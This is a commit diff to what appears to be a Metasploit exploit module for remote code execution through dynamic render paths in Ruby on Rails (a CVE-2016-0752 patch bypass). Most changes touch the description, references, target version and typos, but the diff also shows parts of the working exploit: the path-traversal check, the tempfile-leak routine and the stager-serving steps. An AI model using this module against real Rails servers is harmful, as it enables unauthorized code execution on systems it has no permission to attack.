added a some references

Author: stevenseeley

modules/exploits/multi/http/rails_dynamic_render_code_exec.rb

@@ -14,19 +14,20 @@ def initialize(info = {})
       'Description'    => %q{
         This module exploits a remote code execution vulnerability in the explicit render
         method when leveraging user parameters.
-
-        This module has been tested across multiple versions of RoR including the latest
-        5.0.0.1 - August 10, 2016. The technique used by this module requires the specified
+        This module has been tested across multiple versions of Ruby on Rails.
+        The technique used by this module requires the specified
         endpoint to be using dynamic render paths, such as the following example:
 
         def show
           render params[:id]
         end
 
         Also, the vulnerable target will need a POST endpoint for the TempFile upload, this
-        can literrally be any endpoint. This module bypasses the patch for CVE-2016-0752
-        which, afaik, prevented the exploitation of development.log. Finally, you only get
-        one shot at this if you are testing with the buildin rails server, use caution.
+        can literally be any endpoint. This module doesnt use the log inclusion method of
+        exploitation due to it not being universal enough. Instead, a new code injection
+        technique was found and used whereby an attacker can upload temporary image files
+        against any POST endpoint and use them for the inclusion attack. Finally, you only
+        get one shot at this if you are testing with the builtin rails server, use caution.
       },
       'Author'         =>
         [
@@ -35,9 +36,10 @@ def show
         ],
       'References'  =>
         [
-          [ 'URL', 'https://groups.google.com/forum/#!topic/rubyonrails-security/335P1DcLG00'],        # failed patch
+          [ 'CVE', '2016-0752'],
+          [ 'URL', 'https://groups.google.com/forum/#!topic/rubyonrails-security/335P1DcLG00'],        # rails patch
           [ 'URL', 'https://nvisium.com/blog/2016/01/26/rails-dynamic-render-to-rce-cve-2016-0752/'],  # John Poulin CVE-2016-0752 patched in 5.0.0.beta1.1 - January 25, 2016
-          [ 'URL', 'https://gist.github.com/forced-request/5158759a6418e6376afb'],                     # John's exploit
+          [ 'URL', 'https://gist.github.com/forced-request/5158759a6418e6376afb'],                     # John's original exploit
         ],
       'License'        => MSF_LICENSE,
       'Platform'    => ['linux', 'bsd'],
@@ -49,14 +51,14 @@ def show
       'Privileged'     => false,
       'Targets'     =>
         [
-          [ 'Ruby on Rails 5.0.0.1', {} ]
+          [ 'Ruby on Rails 4.0.8 July 2, 2014', {} ]                                                   # Other versions are also affected
         ],
       'DefaultTarget' => 0,
-      'DisclosureDate' => 'Oct 1 2016'))
+      'DisclosureDate' => 'Oct 16 2016'))
     register_options(
       [
         Opt::RPORT(3000),
-        OptString.new('URIPATH', [ true, 'The path to the vulnerable route', "/wae"]),
+        OptString.new('URIPATH', [ true, 'The path to the vulnerable route', "/users"]),
         OptPort.new('SRVPORT', [ true, 'The daemon port to listen on', 1337 ]),
       ], self.class)
   end
@@ -73,8 +75,8 @@ def check
     if res and res.body =~ /render params/
       return Exploit::CheckCode::Vulnerable
     end
-    
-    # this is the check for the prod environment 
+
+    # this is the check for the prod environment
     res = send_request_cgi({
       'uri'       =>  normalize_uri(datastore['URIPATH'], "%2fproc%2fself%2fcomm"),
       'method'    =>  'GET',
@@ -123,7 +125,7 @@ def send_payload
       return true
     else
 
-      # thsi is where we pull the log file
+      # this is where we pull the log file
       if leak_log
         return true
       end
@@ -142,10 +144,9 @@ def leak_log
 
     if res and res.code == 200 and res.body =~ /Tempfile:\/(.*)>, @original_filename=/
       @path = "#{$1}" if res.body =~ /Tempfile:\/(.*)>, @original_filename=/
-      true
-    else
-      false
+      return true
     end
+    return false
   end
 
   def start_http_server
@@ -177,7 +178,7 @@ def start_http_server
     connect
   end
 
-  def render_image
+  def render_tmpfile
     @path.gsub!(/\//, '%2f')
     res = send_request_cgi({
       'uri'       =>  normalize_uri(datastore['URIPATH'], @path),
@@ -190,7 +191,7 @@ def exploit
       start_http_server
       if send_payload
         print_good("injected payload")
-        render_image
+        render_tmpfile
 
         # we need to delay, for the stager
         select(nil, nil, nil, 5)